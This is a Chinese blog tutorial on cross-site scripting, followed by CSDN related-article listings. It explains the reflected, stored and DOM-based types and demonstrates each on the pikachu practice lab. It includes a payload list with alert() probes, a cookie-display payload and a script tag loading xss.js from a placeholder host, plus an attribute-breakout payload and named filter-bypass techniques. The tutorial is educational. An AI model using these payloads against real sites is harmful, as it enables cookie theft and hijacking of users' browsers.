XSS跨站脚本漏洞

最新推荐文章于 2024-07-26 17:39:18 发布
最新推荐文章于 2024-07-26 17:39:18 发布
阅读量394 收藏
点赞数
分类专栏: WebSecurity 文章标签: xss 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45557138/article/details/121023710
版权

目录

XSS是什么

XSS攻击位置

XSS攻击载荷

XSS分类

反射型XSS

攻击过程

攻击案例

存储型XSS

攻击过程

攻击案例

DOM型XSS

攻击过程

攻击案例

XSS过滤绕过

XSS防范

XSS是什么

中文名:跨站脚本攻击

英文全称:Cross Site Scripting

为了不与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。

恶意攻击者往web页面里插入恶意js代码,用户在浏览时,嵌在页面中的代码会被执行,达到攻击用户的目的

XSS攻击位置

用户输入作为script标签内容,作为HTML注释内容,作为HTML标签的属性名,作为HTML标签的属性值,作为HTML标签的名字,直接插入到CSS里

在网站评论区、留言区、个人信息、订单信息、站内信、网页即时通讯、私信、意见反馈等地有可能存在,搜索框、当前目录、图片属性等地也有存在的风险

XSS攻击载荷

<script>alert("vegetable")</script>          #弹出vegetable
<script>alert(/vegetable/)</script>          #弹出vegetable
<script>alert(1)</script>                    #弹出1,数字可以不加引号和斜杠
<script>alert(document.cookie)</script>      #弹出cookie
<script src=http://xxx.com/xss.js></script>  #引用外部的xss

<img src=1 οnerrοr=alert("vegetable")>       #打开src为1的图片,如果失败弹出vegetable

<svg onload="alert(1)">

onclick=alert(/vegetable/)                   #鼠标点击弹出vegetable
onmouseover=alert(/vegetable/)               #鼠标移动弹出vegetable

javascript:alert(/vegetable/)                #弹出vegetable

XSS分类

反射型、存储型以及DOM型

反射型XSS

反射型XSS又被称为非持久型XSS,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。

反射型XSS一般用来盗取用户Cookie信息

攻击过程

1 黑客将带有恶意脚本的链接发送给用户

2 用户点击链接向服务器发送了请求

3 服务器将请求信息返回给用户,其中就包含了XSS代码

4 用户浏览器解析了其中的XSS代码

攻击案例

攻击实验使用环境为靶场pikachu

我填入了kobe

然后查看源代码(Ctrl+U),使用Ctrl+F搜索刚才输入的内容

这是正常的流程,但是如果输入的不是科比,而是其他的东西,比如<script>alert(/xss/)</script>

但是发现搜索框不允许输入过多字符,尝试使用BurpSuite工具

点击forward之后,弹出一个框,这就是反射型XSS的检测过程

存储型XSS

存储型XSS又被称为持久型XSS,代码存储在服务器中,如个人信息或留言板等地,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,盗窃cookie等

攻击过程

1 有一站点存在存储型XSS漏洞,允许用户发布及查看信息

2 黑客在该网站留言,留言内容包含有恶意代码,点击提交后,服务器将留言保存

3 用户在浏览信息时点击相关链接

4 用户浏览器解析了其中的XSS代码

攻击案例

仍然使用pikachu靶场

可以看到一个留言板,在其中输入js代码

点击submit后页面立马弹窗,弹出vegetable

在此刷新页面,同样造成页面弹窗,也可以去数据库中查看,证明代码被存储在数据库中

DOM型XSS

通过JavaScript,可以重构整个HTML文档,可以进行添加,移除等操作,对页面的某个东西进行操作时,js就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM,所以在DOM型的xss漏洞利用中,DOM可以看成是一个访问HTML的标准程序接口。

整个操作都是在前端完成,后端并没有参与

攻击过程

1 页面前端有输入点,比如input标签

2 拼接字符串将代码注入

3 利用该漏洞

攻击案例

没错,还是使用pikachu靶场

先随便输一个什么东西,看看会发生什么,然后查看源代码

<script>
    function domxss(){
    var str = document.getElementById("text").value;
    document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }
</script>

定位源码,可以大概了解我们输入的text文本被转化成str字符串,然后拼接到了a标签中

所以尝试将a标签闭合

'><img src="#" οnerrοr="alert(/vegetable/)">

输入此代码,提交后弹窗

XSS过滤绕过

常见的绕过XSS过滤的方式有

大小写绕过

双写绕过

使用其他语句绕过

编码绕过等等

XSS防范

简单来讲就一句话,过滤输入,编码输出

即对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行

过滤可以选择黑名单和白名单结合使用的方式

ve9etable
关注
专栏目录
XSS跨站脚本攻击漏洞修复方法
06-18
**XSS跨站脚本攻击漏洞修复方法** XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网站进行破坏。本文将...
跨站脚本漏洞XSS
qq_48904485的博客
03-22 8580
一、XSS跨站脚本基础 1、XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2、XSS漏洞原理 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执
XSS跨站脚本漏洞简介、原理及防护方法
m0_54899775的博客
03-21 7899
XSS跨站脚本漏洞简介、原理及防护方法 XSS跨站漏洞原理及防护
XSS漏洞详解
最新发布
apple_74953689的博客
07-26 438
XSS类型存储型反射型DOM型触发过程黑客构造XSS脚本后正常用户访问携带XSS脚本的页面正常用户访问携带XSS脚本的URL正常用户访问携带XSS脚本的URL数据存储数据库URLURL谁来输出后端web应用程序后端web应用程序前端Javascript输出位置HTTP响应中HTTP响应中动态构造的DOM节点是否持久是否否W3C提出的CSP是一个HTTP头部,允许网站所有者定义哪些内容可以被加载到页面中。
浅谈“XSS跨站脚本攻击漏洞
→_→
05-20 1249
漏洞名称: 存储型XSS跨站脚本,反射型XSS跨站脚本, 描述: 跨站脚本攻击的英文全称是Cross Site Script,为了和样式表区,缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行。跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用X
跨站脚本攻击漏洞XSS):基础知识和防御策略
weixin_43263566的博客
01-16 1万+
跨站脚本攻击漏洞-基础篇
跨站脚本XSS漏洞
梁辰兴的博客
06-07 4953
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以结合浏览器自身漏洞对用户主机进行远程控制等。形
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS跨站脚本攻击
01-27
跨站脚本攻击(XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结: 1.xss跨站脚本攻击的定义 ...
WEB漏洞-XSS跨站脚本漏洞解决方案
踮脚敲代码
01-11 4629
一、测试过程 通过手工测试,构造用户可控参数访问,发现网站部页面对用户可控参数未做过滤限制,存在XSS跨站脚本漏洞,测试如下: POST /task/notepad/insertNotepad HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,e
XSS-跨站脚本攻击 漏洞详解
m0_69043895的博客
04-20 2136
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
WEB漏洞原理】XSS 跨站脚本攻击
过期的秋刀鱼
08-26 3046
当用户访问被XSS 脚本注入过的网页,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击了。DOM 型XSS 是一种XSS 攻击,其中攻击的代码是由于修改受害者浏览器页面的DOM 树而执行的。搜索框、登录框、微博、留言板、聊天室等等收集用户输入的地方,都有可能被注入XSS 代码,都存在遭受XSS 的风险。XSS 攻击目标是客户端浏览器用户,由于浏览器的类别不同,攻击效果不同,甚至于同一款浏览器,攻击效果都不一样。浏览器的类型,版本等因素都会影响XSS 的效果。
跨站脚本XSS漏洞_跨站脚本漏洞
jennycisp的博客
05-13 1233
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。
关于 XSS跨站脚本漏洞
辉小鱼的博客
09-05 1480
XSS攻击全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
XSS(跨站脚本攻击)漏洞解析(带靶场演示)
wudideaqing的博客
06-24 2069
XSS跨站脚本攻击,全称Cross-Site Scripting)是一种常见网络安全漏洞,允许攻击者在用户浏览器中执行恶意脚本。攻击者通过在受信任网站中注入恶意代码,诱骗用户点击或加载恶意内容,从而窃取数据、篡改页面或劫持用户。
XSS跨站脚本攻击漏洞(1)
weixin_51339377的博客
04-05 3320
XSS漏洞介绍: xss攻击的目录就是让前端把我们的攻击代码执行 跨站攻击 全都是前端的 只需要右击查看源代码就可以查看到漏洞了 测试漏洞方式:弹窗测试(测试成功以后具体功能实现的xss代码有很多免费的xss平台 可以直接使用) 弹窗基本代码: <script>alert(1)</script> 在输入框输入代码提交以后如果出现弹窗说明存在xss漏洞。此时提交成功可以右键在网页源代码里面看到自己提交上去的js代码 因为本身存储框,留言板这种就会在...
DOM型的xss漏洞利用
热门推荐
qq_43814486的博客
04-22 1万+
DOM:通过JavaScript,可以重构整个HTML文档,就是说可以添加,移除等等,对页面的某个东西进行操作时,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM,所以在DOM型的xss漏洞利用中,DOM可以看成是一个访问HTML的标准程序接口。 特征:整个过程都是在前端完成的,没有后端的参与(纯前端的操作!) 原理: 上图var str = docume...
XSS跨站脚本漏洞详解
m0_64583632的博客
02-01 765
xss跨站脚本攻击详解
xss跨站脚本漏洞修复
08-31
XSS跨站脚本漏洞修复是保护网站免受潜在攻击的重要措施。下面是一些常见的修复方法: 1. 输入验证:对于用户输入的数据,进行严格的验证和过滤。使用白名单机制,只允许特定的字符和标签,过滤掉所有潜在的恶意脚本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值